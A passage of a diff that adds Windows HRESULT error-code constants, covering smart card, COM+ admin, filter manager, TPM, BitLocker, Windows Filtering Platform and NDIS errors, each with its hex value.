+SCARD_E_CERTIFICATE_UNAVAILABLE = 0x8010002D
+SCARD_E_NO_READERS_AVAILABLE = 0x8010002E
+SCARD_E_COMM_DATA_LOST = 0x8010002F
+SCARD_E_NO_KEY_CONTAINER = 0x80100030
+SCARD_E_SERVER_TOO_BUSY = 0x80100031
+SCARD_W_UNSUPPORTED_CARD = 0x80100065
+SCARD_W_UNRESPONSIVE_CARD = 0x80100066
+SCARD_W_UNPOWERED_CARD = 0x80100067
+SCARD_W_RESET_CARD = 0x80100068
+SCARD_W_REMOVED_CARD = 0x80100069
+SCARD_W_SECURITY_VIOLATION = 0x8010006A
+SCARD_W_WRONG_CHV = 0x8010006B
+SCARD_W_CHV_BLOCKED = 0x8010006C
+SCARD_W_EOF = 0x8010006D
+SCARD_W_CANCELLED_BY_USER = 0x8010006E
+SCARD_W_CARD_NOT_AUTHENTICATED = 0x8010006F
+COMADMIN_E_OBJECTERRORS = 0x80110401
+COMADMIN_E_OBJECTINVALID = 0x80110402
+COMADMIN_E_KEYMISSING = 0x80110403
+COMADMIN_E_ALREADYINSTALLED = 0x80110404
+COMADMIN_E_APP_FILE_WRITEFAIL = 0x80110407
+COMADMIN_E_APP_FILE_READFAIL = 0x80110408
+COMADMIN_E_APP_FILE_VERSION = 0x80110409
+COMADMIN_E_BADPATH = 0x8011040A
+COMADMIN_E_APPLICATIONEXISTS = 0x8011040B
+COMADMIN_E_ROLEEXISTS = 0x8011040C
+COMADMIN_E_CANTCOPYFILE = 0x8011040D
+COMADMIN_E_NOUSER = 0x8011040F
+COMADMIN_E_INVALIDUSERIDS = 0x80110410
+COMADMIN_E_NOREGISTRYCLSID = 0x80110411
+COMADMIN_E_BADREGISTRYPROGID = 0x80110412
+COMADMIN_E_AUTHENTICATIONLEVEL = 0x80110413
+COMADMIN_E_USERPASSWDNOTVALID = 0x80110414
+COMADMIN_E_CLSIDORIIDMISMATCH = 0x80110418
+COMADMIN_E_REMOTEINTERFACE = 0x80110419
+COMADMIN_E_DLLREGISTERSERVER = 0x8011041A
+COMADMIN_E_NOSERVERSHARE = 0x8011041B
+COMADMIN_E_DLLLOADFAILED = 0x8011041D
+COMADMIN_E_BADREGISTRYLIBID = 0x8011041E
+COMADMIN_E_APPDIRNOTFOUND = 0x8011041F
+COMADMIN_E_REGISTRARFAILED = 0x80110423
+COMADMIN_E_COMPFILE_DOESNOTEXIST = 0x80110424
+COMADMIN_E_COMPFILE_LOADDLLFAIL = 0x80110425
+COMADMIN_E_COMPFILE_GETCLASSOBJ = 0x80110426
+COMADMIN_E_COMPFILE_CLASSNOTAVAIL = 0x80110427
+COMADMIN_E_COMPFILE_BADTLB = 0x80110428
+COMADMIN_E_COMPFILE_NOTINSTALLABLE = 0x80110429
+COMADMIN_E_NOTCHANGEABLE = 0x8011042A
+COMADMIN_E_NOTDELETEABLE = 0x8011042B
+COMADMIN_E_SESSION = 0x8011042C
+COMADMIN_E_COMP_MOVE_LOCKED = 0x8011042D
+COMADMIN_E_COMP_MOVE_BAD_DEST = 0x8011042E
+COMADMIN_E_REGISTERTLB = 0x80110430
+COMADMIN_E_SYSTEMAPP = 0x80110433
+COMADMIN_E_COMPFILE_NOREGISTRAR = 0x80110434
+COMADMIN_E_COREQCOMPINSTALLED = 0x80110435
+COMADMIN_E_SERVICENOTINSTALLED = 0x80110436
+COMADMIN_E_PROPERTYSAVEFAILED = 0x80110437
+COMADMIN_E_OBJECTEXISTS = 0x80110438
+COMADMIN_E_COMPONENTEXISTS = 0x80110439
+COMADMIN_E_REGFILE_CORRUPT = 0x8011043B
+COMADMIN_E_PROPERTY_OVERFLOW = 0x8011043C
+COMADMIN_E_NOTINREGISTRY = 0x8011043E
+COMADMIN_E_OBJECTNOTPOOLABLE = 0x8011043F
+COMADMIN_E_APPLID_MATCHES_CLSID = 0x80110446
+COMADMIN_E_ROLE_DOES_NOT_EXIST = 0x80110447
+COMADMIN_E_START_APP_NEEDS_COMPONENTS = 0x80110448
+COMADMIN_E_REQUIRES_DIFFERENT_PLATFORM = 0x80110449
+COMADMIN_E_CAN_NOT_EXPORT_APP_PROXY = 0x8011044A
+COMADMIN_E_CAN_NOT_START_APP = 0x8011044B
+COMADMIN_E_CAN_NOT_EXPORT_SYS_APP = 0x8011044C
+COMADMIN_E_CANT_SUBSCRIBE_TO_COMPONENT = 0x8011044D
+COMADMIN_E_EVENTCLASS_CANT_BE_SUBSCRIBER = 0x8011044E
+COMADMIN_E_LIB_APP_PROXY_INCOMPATIBLE = 0x8011044F
+COMADMIN_E_BASE_PARTITION_ONLY = 0x80110450
+COMADMIN_E_START_APP_DISABLED = 0x80110451
+COMADMIN_E_CAT_DUPLICATE_PARTITION_NAME = 0x80110457
+COMADMIN_E_CAT_INVALID_PARTITION_NAME = 0x80110458
+COMADMIN_E_CAT_PARTITION_IN_USE = 0x80110459
+COMADMIN_E_FILE_PARTITION_DUPLICATE_FILES = 0x8011045A
+COMADMIN_E_CAT_IMPORTED_COMPONENTS_NOT_ALLOWED = 0x8011045B
+COMADMIN_E_AMBIGUOUS_APPLICATION_NAME = 0x8011045C
+COMADMIN_E_AMBIGUOUS_PARTITION_NAME = 0x8011045D
+COMADMIN_E_REGDB_NOTINITIALIZED = 0x80110472
+COMADMIN_E_REGDB_NOTOPEN = 0x80110473
+COMADMIN_E_REGDB_SYSTEMERR = 0x80110474
+COMADMIN_E_REGDB_ALREADYRUNNING = 0x80110475
+COMADMIN_E_MIG_VERSIONNOTSUPPORTED = 0x80110480
+COMADMIN_E_MIG_SCHEMANOTFOUND = 0x80110481
+COMADMIN_E_CAT_BITNESSMISMATCH = 0x80110482
+COMADMIN_E_CAT_UNACCEPTABLEBITNESS = 0x80110483
+COMADMIN_E_CAT_WRONGAPPBITNESS = 0x80110484
+COMADMIN_E_CAT_PAUSE_RESUME_NOT_SUPPORTED = 0x80110485
+COMADMIN_E_CAT_SERVERFAULT = 0x80110486
+COMQC_E_APPLICATION_NOT_QUEUED = 0x80110600
+COMQC_E_NO_QUEUEABLE_INTERFACES = 0x80110601
+COMQC_E_QUEUING_SERVICE_NOT_AVAILABLE = 0x80110602
+COMQC_E_NO_IPERSISTSTREAM = 0x80110603
+COMQC_E_BAD_MESSAGE = 0x80110604
+COMQC_E_UNAUTHENTICATED = 0x80110605
+COMQC_E_UNTRUSTED_ENQUEUER = 0x80110606
+MSDTC_E_DUPLICATE_RESOURCE = 0x80110701
+COMADMIN_E_OBJECT_PARENT_MISSING = 0x80110808
+COMADMIN_E_OBJECT_DOES_NOT_EXIST = 0x80110809
+COMADMIN_E_APP_NOT_RUNNING = 0x8011080A
+COMADMIN_E_INVALID_PARTITION = 0x8011080B
+COMADMIN_E_SVCAPP_NOT_POOLABLE_OR_RECYCLABLE = 0x8011080D
+COMADMIN_E_USER_IN_SET = 0x8011080E
+COMADMIN_E_CANTRECYCLELIBRARYAPPS = 0x8011080F
+COMADMIN_E_CANTRECYCLESERVICEAPPS = 0x80110811
+COMADMIN_E_PROCESSALREADYRECYCLED = 0x80110812
+COMADMIN_E_PAUSEDPROCESSMAYNOTBERECYCLED = 0x80110813
+COMADMIN_E_CANTMAKEINPROCSERVICE = 0x80110814
+COMADMIN_E_PROGIDINUSEBYCLSID = 0x80110815
+COMADMIN_E_DEFAULT_PARTITION_NOT_IN_SET = 0x80110816
+COMADMIN_E_RECYCLEDPROCESSMAYNOTBEPAUSED = 0x80110817
+COMADMIN_E_PARTITION_ACCESSDENIED = 0x80110818
+COMADMIN_E_PARTITION_MSI_ONLY = 0x80110819
+COMADMIN_E_LEGACYCOMPS_NOT_ALLOWED_IN_1_0_FORMAT = 0x8011081A
+COMADMIN_E_LEGACYCOMPS_NOT_ALLOWED_IN_NONBASE_PARTITIONS = 0x8011081B
+COMADMIN_E_COMP_MOVE_SOURCE = 0x8011081C
+COMADMIN_E_COMP_MOVE_DEST = 0x8011081D
+COMADMIN_E_COMP_MOVE_PRIVATE = 0x8011081E
+COMADMIN_E_BASEPARTITION_REQUIRED_IN_SET = 0x8011081F
+COMADMIN_E_CANNOT_ALIAS_EVENTCLASS = 0x80110820
+COMADMIN_E_PRIVATE_ACCESSDENIED = 0x80110821
+COMADMIN_E_SAFERINVALID = 0x80110822
+COMADMIN_E_REGISTRY_ACCESSDENIED = 0x80110823
+COMADMIN_E_PARTITIONS_DISABLED = 0x80110824
+ERROR_FLT_NO_HANDLER_DEFINED = 0x801F0001
+ERROR_FLT_CONTEXT_ALREADY_DEFINED = 0x801F0002
+ERROR_FLT_INVALID_ASYNCHRONOUS_REQUEST = 0x801F0003
+ERROR_FLT_DISALLOW_FAST_IO = 0x801F0004
+ERROR_FLT_INVALID_NAME_REQUEST = 0x801F0005
+ERROR_FLT_NOT_SAFE_TO_POST_OPERATION = 0x801F0006
+ERROR_FLT_NOT_INITIALIZED = 0x801F0007
+ERROR_FLT_FILTER_NOT_READY = 0x801F0008
+ERROR_FLT_POST_OPERATION_CLEANUP = 0x801F0009
+ERROR_FLT_INTERNAL_ERROR = 0x801F000A
+ERROR_FLT_DELETING_OBJECT = 0x801F000B
+ERROR_FLT_MUST_BE_NONPAGED_POOL = 0x801F000C
+ERROR_FLT_DUPLICATE_ENTRY = 0x801F000D
+ERROR_FLT_CBDQ_DISABLED = 0x801F000E
+ERROR_FLT_DO_NOT_ATTACH = 0x801F000F
+ERROR_FLT_DO_NOT_DETACH = 0x801F0010
+ERROR_FLT_INSTANCE_ALTITUDE_COLLISION = 0x801F0011
+ERROR_FLT_INSTANCE_NAME_COLLISION = 0x801F0012
+ERROR_FLT_FILTER_NOT_FOUND = 0x801F0013
+ERROR_FLT_VOLUME_NOT_FOUND = 0x801F0014
+ERROR_FLT_INSTANCE_NOT_FOUND = 0x801F0015
+ERROR_FLT_CONTEXT_ALLOCATION_NOT_FOUND = 0x801F0016
+ERROR_FLT_INVALID_CONTEXT_REGISTRATION = 0x801F0017
+ERROR_FLT_NAME_CACHE_MISS = 0x801F0018
+ERROR_FLT_NO_DEVICE_OBJECT = 0x801F0019
+ERROR_FLT_VOLUME_ALREADY_MOUNTED = 0x801F001A
+ERROR_FLT_ALREADY_ENLISTED = 0x801F001B
+ERROR_FLT_CONTEXT_ALREADY_LINKED = 0x801F001C
+ERROR_FLT_NO_WAITER_FOR_REPLY = 0x801F0020
+ERROR_HUNG_DISPLAY_DRIVER_THREAD = 0x80260001
+ERROR_MONITOR_NO_DESCRIPTOR = 0x80261001
+ERROR_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT = 0x80261002
+DWM_E_COMPOSITIONDISABLED = 0x80263001
+DWM_E_REMOTING_NOT_SUPPORTED = 0x80263002
+DWM_E_NO_REDIRECTION_SURFACE_AVAILABLE = 0x80263003
+DWM_E_NOT_QUEUING_PRESENTS = 0x80263004
+TPM_E_ERROR_MASK = 0x80280000
+TPM_E_AUTHFAIL = 0x80280001
+TPM_E_BADINDEX = 0x80280002
+TPM_E_BAD_PARAMETER = 0x80280003
+TPM_E_AUDITFAILURE = 0x80280004
+TPM_E_CLEAR_DISABLED = 0x80280005
+TPM_E_DEACTIVATED = 0x80280006
+TPM_E_DISABLED = 0x80280007
+TPM_E_DISABLED_CMD = 0x80280008
+TPM_E_FAIL = 0x80280009
+TPM_E_BAD_ORDINAL = 0x8028000A
+TPM_E_INSTALL_DISABLED = 0x8028000B
+TPM_E_INVALID_KEYHANDLE = 0x8028000C
+TPM_E_KEYNOTFOUND = 0x8028000D
+TPM_E_INAPPROPRIATE_ENC = 0x8028000E
+TPM_E_MIGRATEFAIL = 0x8028000F
+TPM_E_INVALID_PCR_INFO = 0x80280010
+TPM_E_NOSPACE = 0x80280011
+TPM_E_NOSRK = 0x80280012
+TPM_E_NOTSEALED_BLOB = 0x80280013
+TPM_E_OWNER_SET = 0x80280014
+TPM_E_RESOURCES = 0x80280015
+TPM_E_SHORTRANDOM = 0x80280016
+TPM_E_SIZE = 0x80280017
+TPM_E_WRONGPCRVAL = 0x80280018
+TPM_E_BAD_PARAM_SIZE = 0x80280019
+TPM_E_SHA_THREAD = 0x8028001A
+TPM_E_SHA_ERROR = 0x8028001B
+TPM_E_FAILEDSELFTEST = 0x8028001C
+TPM_E_AUTH2FAIL = 0x8028001D
+TPM_E_BADTAG = 0x8028001E
+TPM_E_IOERROR = 0x8028001F
+TPM_E_ENCRYPT_ERROR = 0x80280020
+TPM_E_DECRYPT_ERROR = 0x80280021
+TPM_E_INVALID_AUTHHANDLE = 0x80280022
+TPM_E_NO_ENDORSEMENT = 0x80280023
+TPM_E_INVALID_KEYUSAGE = 0x80280024
+TPM_E_WRONG_ENTITYTYPE = 0x80280025
+TPM_E_INVALID_POSTINIT = 0x80280026
+TPM_E_INAPPROPRIATE_SIG = 0x80280027
+TPM_E_BAD_KEY_PROPERTY = 0x80280028
+TPM_E_BAD_MIGRATION = 0x80280029
+TPM_E_BAD_SCHEME = 0x8028002A
+TPM_E_BAD_DATASIZE = 0x8028002B
+TPM_E_BAD_MODE = 0x8028002C
+TPM_E_BAD_PRESENCE = 0x8028002D
+TPM_E_BAD_VERSION = 0x8028002E
+TPM_E_NO_WRAP_TRANSPORT = 0x8028002F
+TPM_E_AUDITFAIL_UNSUCCESSFUL = 0x80280030
+TPM_E_AUDITFAIL_SUCCESSFUL = 0x80280031
+TPM_E_NOTRESETABLE = 0x80280032
+TPM_E_NOTLOCAL = 0x80280033
+TPM_E_BAD_TYPE = 0x80280034
+TPM_E_INVALID_RESOURCE = 0x80280035
+TPM_E_NOTFIPS = 0x80280036
+TPM_E_INVALID_FAMILY = 0x80280037
+TPM_E_NO_NV_PERMISSION = 0x80280038
+TPM_E_REQUIRES_SIGN = 0x80280039
+TPM_E_KEY_NOTSUPPORTED = 0x8028003A
+TPM_E_AUTH_CONFLICT = 0x8028003B
+TPM_E_AREA_LOCKED = 0x8028003C
+TPM_E_BAD_LOCALITY = 0x8028003D
+TPM_E_READ_ONLY = 0x8028003E
+TPM_E_PER_NOWRITE = 0x8028003F
+TPM_E_FAMILYCOUNT = 0x80280040
+TPM_E_WRITE_LOCKED = 0x80280041
+TPM_E_BAD_ATTRIBUTES = 0x80280042
+TPM_E_INVALID_STRUCTURE = 0x80280043
+TPM_E_KEY_OWNER_CONTROL = 0x80280044
+TPM_E_BAD_COUNTER = 0x80280045
+TPM_E_NOT_FULLWRITE = 0x80280046
+TPM_E_CONTEXT_GAP = 0x80280047
+TPM_E_MAXNVWRITES = 0x80280048
+TPM_E_NOOPERATOR = 0x80280049
+TPM_E_RESOURCEMISSING = 0x8028004A
+TPM_E_DELEGATE_LOCK = 0x8028004B
+TPM_E_DELEGATE_FAMILY = 0x8028004C
+TPM_E_DELEGATE_ADMIN = 0x8028004D
+TPM_E_TRANSPORT_NOTEXCLUSIVE = 0x8028004E
+TPM_E_OWNER_CONTROL = 0x8028004F
+TPM_E_DAA_RESOURCES = 0x80280050
+TPM_E_DAA_INPUT_DATA0 = 0x80280051
+TPM_E_DAA_INPUT_DATA1 = 0x80280052
+TPM_E_DAA_ISSUER_SETTINGS = 0x80280053
+TPM_E_DAA_TPM_SETTINGS = 0x80280054
+TPM_E_DAA_STAGE = 0x80280055
+TPM_E_DAA_ISSUER_VALIDITY = 0x80280056
+TPM_E_DAA_WRONG_W = 0x80280057
+TPM_E_BAD_HANDLE = 0x80280058
+TPM_E_BAD_DELEGATE = 0x80280059
+TPM_E_BADCONTEXT = 0x8028005A
+TPM_E_TOOMANYCONTEXTS = 0x8028005B
+TPM_E_MA_TICKET_SIGNATURE = 0x8028005C
+TPM_E_MA_DESTINATION = 0x8028005D
+TPM_E_MA_SOURCE = 0x8028005E
+TPM_E_MA_AUTHORITY = 0x8028005F
+TPM_E_PERMANENTEK = 0x80280061
+TPM_E_BAD_SIGNATURE = 0x80280062
+TPM_E_NOCONTEXTSPACE = 0x80280063
+TPM_E_COMMAND_BLOCKED = 0x80280400
+TPM_E_INVALID_HANDLE = 0x80280401
+TPM_E_DUPLICATE_VHANDLE = 0x80280402
+TPM_E_EMBEDDED_COMMAND_BLOCKED = 0x80280403
+TPM_E_EMBEDDED_COMMAND_UNSUPPORTED = 0x80280404
+TPM_E_RETRY = 0x80280800
+TPM_E_NEEDS_SELFTEST = 0x80280801
+TPM_E_DOING_SELFTEST = 0x80280802
+TPM_E_DEFEND_LOCK_RUNNING = 0x80280803
+TBS_E_INTERNAL_ERROR = 0x80284001
+TBS_E_BAD_PARAMETER = 0x80284002
+TBS_E_INVALID_OUTPUT_POINTER = 0x80284003
+TBS_E_INVALID_CONTEXT = 0x80284004
+TBS_E_INSUFFICIENT_BUFFER = 0x80284005
+TBS_E_IOERROR = 0x80284006
+TBS_E_INVALID_CONTEXT_PARAM = 0x80284007
+TBS_E_SERVICE_NOT_RUNNING = 0x80284008
+TBS_E_TOO_MANY_TBS_CONTEXTS = 0x80284009
+TBS_E_TOO_MANY_RESOURCES = 0x8028400A
+TBS_E_SERVICE_START_PENDING = 0x8028400B
+TBS_E_PPI_NOT_SUPPORTED = 0x8028400C
+TBS_E_COMMAND_CANCELED = 0x8028400D
+TBS_E_BUFFER_TOO_LARGE = 0x8028400E
+TPMAPI_E_INVALID_STATE = 0x80290100
+TPMAPI_E_NOT_ENOUGH_DATA = 0x80290101
+TPMAPI_E_TOO_MUCH_DATA = 0x80290102
+TPMAPI_E_INVALID_OUTPUT_POINTER = 0x80290103
+TPMAPI_E_INVALID_PARAMETER = 0x80290104
+TPMAPI_E_OUT_OF_MEMORY = 0x80290105
+TPMAPI_E_BUFFER_TOO_SMALL = 0x80290106
+TPMAPI_E_INTERNAL_ERROR = 0x80290107
+TPMAPI_E_ACCESS_DENIED = 0x80290108
+TPMAPI_E_AUTHORIZATION_FAILED = 0x80290109
+TPMAPI_E_INVALID_CONTEXT_HANDLE = 0x8029010A
+TPMAPI_E_TBS_COMMUNICATION_ERROR = 0x8029010B
+TPMAPI_E_TPM_COMMAND_ERROR = 0x8029010C
+TPMAPI_E_MESSAGE_TOO_LARGE = 0x8029010D
+TPMAPI_E_INVALID_ENCODING = 0x8029010E
+TPMAPI_E_INVALID_KEY_SIZE = 0x8029010F
+TPMAPI_E_ENCRYPTION_FAILED = 0x80290110
+TPMAPI_E_INVALID_KEY_PARAMS = 0x80290111
+TPMAPI_E_INVALID_MIGRATION_AUTHORIZATION_BLOB = 0x80290112
+TPMAPI_E_INVALID_PCR_INDEX = 0x80290113
+TPMAPI_E_INVALID_DELEGATE_BLOB = 0x80290114
+TPMAPI_E_INVALID_CONTEXT_PARAMS = 0x80290115
+TPMAPI_E_INVALID_KEY_BLOB = 0x80290116
+TPMAPI_E_INVALID_PCR_DATA = 0x80290117
+TPMAPI_E_INVALID_OWNER_AUTH = 0x80290118
+TBSIMP_E_BUFFER_TOO_SMALL = 0x80290200
+TBSIMP_E_CLEANUP_FAILED = 0x80290201
+TBSIMP_E_INVALID_CONTEXT_HANDLE = 0x80290202
+TBSIMP_E_INVALID_CONTEXT_PARAM = 0x80290203
+TBSIMP_E_TPM_ERROR = 0x80290204
+TBSIMP_E_HASH_BAD_KEY = 0x80290205
+TBSIMP_E_DUPLICATE_VHANDLE = 0x80290206
+TBSIMP_E_INVALID_OUTPUT_POINTER = 0x80290207
+TBSIMP_E_INVALID_PARAMETER = 0x80290208
+TBSIMP_E_RPC_INIT_FAILED = 0x80290209
+TBSIMP_E_SCHEDULER_NOT_RUNNING = 0x8029020A
+TBSIMP_E_COMMAND_CANCELED = 0x8029020B
+TBSIMP_E_OUT_OF_MEMORY = 0x8029020C
+TBSIMP_E_LIST_NO_MORE_ITEMS = 0x8029020D
+TBSIMP_E_LIST_NOT_FOUND = 0x8029020E
+TBSIMP_E_NOT_ENOUGH_SPACE = 0x8029020F
+TBSIMP_E_NOT_ENOUGH_TPM_CONTEXTS = 0x80290210
+TBSIMP_E_COMMAND_FAILED = 0x80290211
+TBSIMP_E_UNKNOWN_ORDINAL = 0x80290212
+TBSIMP_E_RESOURCE_EXPIRED = 0x80290213
+TBSIMP_E_INVALID_RESOURCE = 0x80290214
+TBSIMP_E_NOTHING_TO_UNLOAD = 0x80290215
+TBSIMP_E_HASH_TABLE_FULL = 0x80290216
+TBSIMP_E_TOO_MANY_TBS_CONTEXTS = 0x80290217
+TBSIMP_E_TOO_MANY_RESOURCES = 0x80290218
+TBSIMP_E_PPI_NOT_SUPPORTED = 0x80290219
+TBSIMP_E_TPM_INCOMPATIBLE = 0x8029021A
+TPM_E_PPI_ACPI_FAILURE = 0x80290300
+TPM_E_PPI_USER_ABORT = 0x80290301
+TPM_E_PPI_BIOS_FAILURE = 0x80290302
+TPM_E_PPI_NOT_SUPPORTED = 0x80290303
+PLA_E_DCS_NOT_FOUND = 0x80300002
+PLA_E_TOO_MANY_FOLDERS = 0x80300045
+PLA_E_NO_MIN_DISK = 0x80300070
+PLA_E_DCS_IN_USE = 0x803000AA
+PLA_E_DCS_ALREADY_EXISTS = 0x803000B7
+PLA_E_PROPERTY_CONFLICT = 0x80300101
+PLA_E_DCS_SINGLETON_REQUIRED = 0x80300102
+PLA_E_CREDENTIALS_REQUIRED = 0x80300103
+PLA_E_DCS_NOT_RUNNING = 0x80300104
+PLA_E_CONFLICT_INCL_EXCL_API = 0x80300105
+PLA_E_NETWORK_EXE_NOT_VALID = 0x80300106
+PLA_E_EXE_ALREADY_CONFIGURED = 0x80300107
+PLA_E_EXE_PATH_NOT_VALID = 0x80300108
+PLA_E_DC_ALREADY_EXISTS = 0x80300109
+PLA_E_DCS_START_WAIT_TIMEOUT = 0x8030010A
+PLA_E_DC_START_WAIT_TIMEOUT = 0x8030010B
+PLA_E_REPORT_WAIT_TIMEOUT = 0x8030010C
+PLA_E_NO_DUPLICATES = 0x8030010D
+PLA_E_EXE_FULL_PATH_REQUIRED = 0x8030010E
+PLA_E_INVALID_SESSION_NAME = 0x8030010F
+PLA_E_PLA_CHANNEL_NOT_ENABLED = 0x80300110
+PLA_E_TASKSCHED_CHANNEL_NOT_ENABLED = 0x80300111
+FVE_E_LOCKED_VOLUME = 0x80310000
+FVE_E_NOT_ENCRYPTED = 0x80310001
+FVE_E_NO_TPM_BIOS = 0x80310002
+FVE_E_NO_MBR_METRIC = 0x80310003
+FVE_E_NO_BOOTSECTOR_METRIC = 0x80310004
+FVE_E_NO_BOOTMGR_METRIC = 0x80310005
+FVE_E_WRONG_BOOTMGR = 0x80310006
+FVE_E_SECURE_KEY_REQUIRED = 0x80310007
+FVE_E_NOT_ACTIVATED = 0x80310008
+FVE_E_ACTION_NOT_ALLOWED = 0x80310009
+FVE_E_AD_SCHEMA_NOT_INSTALLED = 0x8031000A
+FVE_E_AD_INVALID_DATATYPE = 0x8031000B
+FVE_E_AD_INVALID_DATASIZE = 0x8031000C
+FVE_E_AD_NO_VALUES = 0x8031000D
+FVE_E_AD_ATTR_NOT_SET = 0x8031000E
+FVE_E_AD_GUID_NOT_FOUND = 0x8031000F
+FVE_E_BAD_INFORMATION = 0x80310010
+FVE_E_TOO_SMALL = 0x80310011
+FVE_E_SYSTEM_VOLUME = 0x80310012
+FVE_E_FAILED_WRONG_FS = 0x80310013
+FVE_E_FAILED_BAD_FS = 0x80310014
+FVE_E_NOT_SUPPORTED = 0x80310015
+FVE_E_BAD_DATA = 0x80310016
+FVE_E_VOLUME_NOT_BOUND = 0x80310017
+FVE_E_TPM_NOT_OWNED = 0x80310018
+FVE_E_NOT_DATA_VOLUME = 0x80310019
+FVE_E_AD_INSUFFICIENT_BUFFER = 0x8031001A
+FVE_E_CONV_READ = 0x8031001B
+FVE_E_CONV_WRITE = 0x8031001C
+FVE_E_KEY_REQUIRED = 0x8031001D
+FVE_E_CLUSTERING_NOT_SUPPORTED = 0x8031001E
+FVE_E_VOLUME_BOUND_ALREADY = 0x8031001F
+FVE_E_OS_NOT_PROTECTED = 0x80310020
+FVE_E_PROTECTION_DISABLED = 0x80310021
+FVE_E_RECOVERY_KEY_REQUIRED = 0x80310022
+FVE_E_FOREIGN_VOLUME = 0x80310023
+FVE_E_OVERLAPPED_UPDATE = 0x80310024
+FVE_E_TPM_SRK_AUTH_NOT_ZERO = 0x80310025
+FVE_E_FAILED_SECTOR_SIZE = 0x80310026
+FVE_E_FAILED_AUTHENTICATION = 0x80310027
+FVE_E_NOT_OS_VOLUME = 0x80310028
+FVE_E_AUTOUNLOCK_ENABLED = 0x80310029
+FVE_E_WRONG_BOOTSECTOR = 0x8031002A
+FVE_E_WRONG_SYSTEM_FS = 0x8031002B
+FVE_E_POLICY_PASSWORD_REQUIRED = 0x8031002C
+FVE_E_CANNOT_SET_FVEK_ENCRYPTED = 0x8031002D
+FVE_E_CANNOT_ENCRYPT_NO_KEY = 0x8031002E
+FVE_E_BOOTABLE_CDDVD = 0x80310030
+FVE_E_PROTECTOR_EXISTS = 0x80310031
+FVE_E_RELATIVE_PATH = 0x80310032
+FWP_E_CALLOUT_NOT_FOUND = 0x80320001
+FWP_E_CONDITION_NOT_FOUND = 0x80320002
+FWP_E_FILTER_NOT_FOUND = 0x80320003
+FWP_E_LAYER_NOT_FOUND = 0x80320004
+FWP_E_PROVIDER_NOT_FOUND = 0x80320005
+FWP_E_PROVIDER_CONTEXT_NOT_FOUND = 0x80320006
+FWP_E_SUBLAYER_NOT_FOUND = 0x80320007
+FWP_E_NOT_FOUND = 0x80320008
+FWP_E_ALREADY_EXISTS = 0x80320009
+FWP_E_IN_USE = 0x8032000A
+FWP_E_DYNAMIC_SESSION_IN_PROGRESS = 0x8032000B
+FWP_E_WRONG_SESSION = 0x8032000C
+FWP_E_NO_TXN_IN_PROGRESS = 0x8032000D
+FWP_E_TXN_IN_PROGRESS = 0x8032000E
+FWP_E_TXN_ABORTED = 0x8032000F
+FWP_E_SESSION_ABORTED = 0x80320010
+FWP_E_INCOMPATIBLE_TXN = 0x80320011
+FWP_E_TIMEOUT = 0x80320012
+FWP_E_NET_EVENTS_DISABLED = 0x80320013
+FWP_E_INCOMPATIBLE_LAYER = 0x80320014
+FWP_E_KM_CLIENTS_ONLY = 0x80320015
+FWP_E_LIFETIME_MISMATCH = 0x80320016
+FWP_E_BUILTIN_OBJECT = 0x80320017
+FWP_E_TOO_MANY_BOOTTIME_FILTERS = 0x80320018
+FWP_E_NOTIFICATION_DROPPED = 0x80320019
+FWP_E_TRAFFIC_MISMATCH = 0x8032001A
+FWP_E_INCOMPATIBLE_SA_STATE = 0x8032001B
+FWP_E_NULL_POINTER = 0x8032001C
+FWP_E_INVALID_ENUMERATOR = 0x8032001D
+FWP_E_INVALID_FLAGS = 0x8032001E
+FWP_E_INVALID_NET_MASK = 0x8032001F
+FWP_E_INVALID_RANGE = 0x80320020
+FWP_E_INVALID_INTERVAL = 0x80320021
+FWP_E_ZERO_LENGTH_ARRAY = 0x80320022
+FWP_E_NULL_DISPLAY_NAME = 0x80320023
+FWP_E_INVALID_ACTION_TYPE = 0x80320024
+FWP_E_INVALID_WEIGHT = 0x80320025
+FWP_E_MATCH_TYPE_MISMATCH = 0x80320026
+FWP_E_TYPE_MISMATCH = 0x80320027
+FWP_E_OUT_OF_BOUNDS = 0x80320028
+FWP_E_RESERVED = 0x80320029
+FWP_E_DUPLICATE_CONDITION = 0x8032002A
+FWP_E_DUPLICATE_KEYMOD = 0x8032002B
+FWP_E_ACTION_INCOMPATIBLE_WITH_LAYER = 0x8032002C
+FWP_E_ACTION_INCOMPATIBLE_WITH_SUBLAYER = 0x8032002D
+FWP_E_CONTEXT_INCOMPATIBLE_WITH_LAYER = 0x8032002E
+FWP_E_CONTEXT_INCOMPATIBLE_WITH_CALLOUT = 0x8032002F
+FWP_E_INCOMPATIBLE_AUTH_METHOD = 0x80320030
+FWP_E_INCOMPATIBLE_DH_GROUP = 0x80320031
+FWP_E_EM_NOT_SUPPORTED = 0x80320032
+FWP_E_NEVER_MATCH = 0x80320033
+FWP_E_PROVIDER_CONTEXT_MISMATCH = 0x80320034
+FWP_E_INVALID_PARAMETER = 0x80320035
+FWP_E_TOO_MANY_SUBLAYERS = 0x80320036
+FWP_E_CALLOUT_NOTIFICATION_FAILED = 0x80320037
+FWP_E_INCOMPATIBLE_AUTH_CONFIG = 0x80320038
+FWP_E_INCOMPATIBLE_CIPHER_CONFIG = 0x80320039
+ERROR_NDIS_INTERFACE_CLOSING = 0x80340002
+ERROR_NDIS_BAD_VERSION = 0x80340004
+ERROR_NDIS_BAD_CHARACTERISTICS = 0x80340005
+ERROR_NDIS_ADAPTER_NOT_FOUND = 0x80340006
+ERROR_NDIS_OPEN_FAILED = 0x80340007
+ERROR_NDIS_DEVICE_FAILED = 0x80340008
+ERROR_NDIS_MULTICAST_FULL = 0x80340009
+ERROR_NDIS_MULTICAST_EXISTS = 0x8034000A
+ERROR_NDIS_MULTICAST_NOT_FOUND = 0x8034000B
+ERROR_NDIS_REQUEST_ABORTED = 0x8034000C
+ERROR_NDIS_RESET_IN_PROGRESS = 0x8034000D
+ERROR_NDIS_INVALID_PACKET = 0x8034000F
+ERROR_NDIS_INVALID_DEVICE_REQUEST = 0x80340010
+ERROR_NDIS_ADAPTER_NOT_READY = 0x80340011
+ERROR_NDIS_INVALID_LENGTH = 0x80340014
+ERROR_NDIS_INVALID_DATA = 0x80340015
+ERROR_NDIS_BUFFER_TOO_SHORT = 0x80340016
+ERROR_NDIS_INVALID_OID = 0x80340017
+ERROR_NDIS_ADAPTER_REMOVED = 0x80340018
+ERROR_NDIS_UNSUPPORTED_MEDIA = 0x80340019
+ERROR_NDIS_GROUP_ADDRESS_IN_USE = 0x8034001A
+ERROR_NDIS_FILE_NOT_FOUND = 0x8034001B
+ERROR_NDIS_ERROR_READING_FILE = 0x8034001C
+ERROR_NDIS_ALREADY_MAPPED = 0x8034001D
